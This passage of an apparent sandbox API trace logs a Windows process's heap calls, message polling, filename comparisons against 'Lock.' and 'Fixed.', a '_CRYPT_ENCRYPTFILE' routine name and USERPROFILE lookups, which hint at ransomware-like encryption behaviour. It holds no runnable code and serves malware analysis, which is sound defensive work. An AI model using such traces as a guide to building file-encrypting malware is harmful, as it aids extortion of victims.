wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.648] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0232.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0232.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0232.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0232.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0232.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IYqWm9FjXEquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0232.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YqWm9FjXEquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qWm9FjXEquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wm9FjXEquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m9FjXEquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9FjXEquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FjXEquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jXEquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XEquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EquwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="quwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uwVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wVFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FEM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EM.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0232.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0232.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0232.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0232.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0232.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0232.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0232.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0232.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0232.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0232.649] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0232.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0232.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0232.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0232.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0232.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0232.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0232.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0232.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0232.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2c) returned 0x2f045e8 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IYqWm9FjXEquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YqWm9FjXEquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qWm9FjXEquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wm9FjXEquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m9FjXEquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9FjXEquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FjXEquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jXEquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XEquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EquwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="quwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uwVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wVFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FEM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0232.650] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EM.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0232.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0232.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0232.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0232.651] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0232.651] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0232.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0232.651] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0232.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.652] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0232.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0232.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0232.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0232.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0232.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505d8 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0232.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0232.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0232.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0232.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0232.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0232.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0232.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0232.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0232.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9e0 | out: hHeap=0x970000) returned 1 [0232.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0232.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0232.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0232.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0232.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0232.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0232.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0232.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0232.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0232.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0232.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 